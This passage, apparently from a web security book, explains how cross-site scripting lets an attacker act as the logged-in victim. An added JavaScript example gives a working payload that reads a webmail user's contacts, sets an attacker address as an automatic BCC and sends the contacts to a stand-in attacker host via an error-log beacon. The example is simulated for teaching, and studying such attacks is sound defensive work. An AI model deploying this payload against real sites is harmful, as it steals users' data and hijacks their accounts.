Thus, the attacker does not even have to code the grabPasswords page, because the
requests (including the stolen data in the query string) are written to the web
server's error log, where they can be read at leisure.
Acting as the Victim
The greatest impact XSS has on web applications is that it lets the attacker act as
the user of the application: the injected script runs in the victim's browser, inside
the victim's authenticated session, so every request it makes is indistinguishable
from one the user made. Following are a few examples of what attackers can do,
depending on the web application.
• In a webmail application, an attacker can
  • send e-mails on the user's behalf
  • acquire the user's list of contacts
  • change automatic BCC properties (for example, the attacker can be
    automatically BCCed on all new outgoing e-mails)
  • change privacy/logging settings
46 Hacking Exposed Web 2.0
• In a web-based instant messaging or chat application, an attacker can
  • acquire a list of contacts
  • send messages to contacts
  • add/remove contacts
• In a web-based banking or financial system, an attacker can
  • transfer funds
  • apply for credit cards
  • change addresses
  • purchase checks
• In an e-commerce site, an attacker can
  • purchase products
Whenever you are analyzing the impact of XSS on a site, imagine what an attacker
could do if he or she were able to take control of the victim's mouse and keyboard.
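The following is an added example, not code from the book, showing both points above in one payload: a script injected into a (hypothetical) webmail application that runs with the victim's session, reads the contact list, adds the attacker as an automatic BCC, and then reports the contacts by requesting a page on the attacker's host that does not exist, so that the data ends up in that server's error log. The endpoints /api/contacts and /api/settings, the host attacker.example, and the session cookie value are all assumptions. So that it runs offline, the webmail backend and the attacker's log are simulated in memory and the payload takes a fetch-like function as a parameter; in a real browser you would pass window.fetch and use `new Image().src = url` as the beacon.

```javascript
// Added example (not from the book): an XSS payload that "acts as the victim".
// Because the script runs in the victim's origin, the browser attaches the
// victim's session cookie to every request it makes, and the backend treats
// those requests exactly like the user's own clicks.
//
// Assumptions: the webmail API paths, the attacker host and the cookie value
// below are hypothetical and chosen only for this demonstration.

const ATTACKER = "http://attacker.example/grabPasswords"; // hypothetical host/page

// The payload. `doFetch(url, options)` must resolve to an object with
// {status, json()} like the browser's fetch; `beacon(url)` stands in for
// `new Image().src = url`, which fires a GET without reading the response.
async function actAsVictim(doFetch, beacon) {
  // 1. Read the victim's contacts using the victim's own session.
  const res = await doFetch("/api/contacts", { credentials: "include" });
  const contacts = await res.json();

  // 2. Silently add the attacker to the victim's automatic-BCC setting.
  await doFetch("/api/settings", {
    method: "POST",
    credentials: "include",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ autoBcc: "mallory@attacker.example" }), // hypothetical
  });

  // 3. Exfiltrate. /grabPasswords does not exist on the attacker's server;
  //    the 404 request line, query string included, is still written to its
  //    error log, which is all the attacker needs.
  beacon(ATTACKER + "?c=" + encodeURIComponent(contacts.join(",")));
  return contacts;
}

// --- Constructed, in-memory stand-in for the webmail backend ---------------
function makeFakeWebmail() {
  const state = {
    sessionCookie: "SESSID=victim-session-token", // constructed value
    contacts: ["alice@example.com", "bob@example.com"], // constructed data
    settings: { autoBcc: "" },
    attackerLog: [], // what the attacker's error log would capture
  };

  // Mimics fetch(): with credentials "include" the browser sends the session
  // cookie automatically, so the server authenticates the request as the victim.
  async function fakeFetch(url, opts = {}) {
    const cookie = opts.credentials === "include" ? state.sessionCookie : "";
    if (cookie !== state.sessionCookie) {
      return { status: 401, json: async () => ({ error: "unauthenticated" }) };
    }
    if (url === "/api/contacts") {
      return { status: 200, json: async () => state.contacts.slice() };
    }
    if (url === "/api/settings" && opts.method === "POST") {
      Object.assign(state.settings, JSON.parse(opts.body));
      return { status: 200, json: async () => state.settings };
    }
    return { status: 404, json: async () => ({}) };
  }

  // Mimics the attacker's web server: the page is missing, but the request
  // (and its query string) is still logged.
  function fakeBeacon(url) {
    state.attackerLog.push(`GET ${url} 404`);
  }

  return { state, fakeFetch, fakeBeacon };
}

// Runs the payload against the simulated backend and returns what happened:
// the leaked contacts, the changed BCC setting and the attacker's log line.
async function demo() {
  const { state, fakeFetch, fakeBeacon } = makeFakeWebmail();
  const leaked = await actAsVictim(fakeFetch, fakeBeacon);
  return { leaked, autoBcc: state.settings.autoBcc, log: state.attackerLog };
}

// Usage: demo().then((r) => console.log(JSON.stringify(r, null, 2)));
```

Note that the payload never needs the victim's password or session token: the browser supplies the session on its behalf, which is why cookie theft is only one of the options an XSS attacker has, and why HttpOnly cookies do not prevent this class of attack.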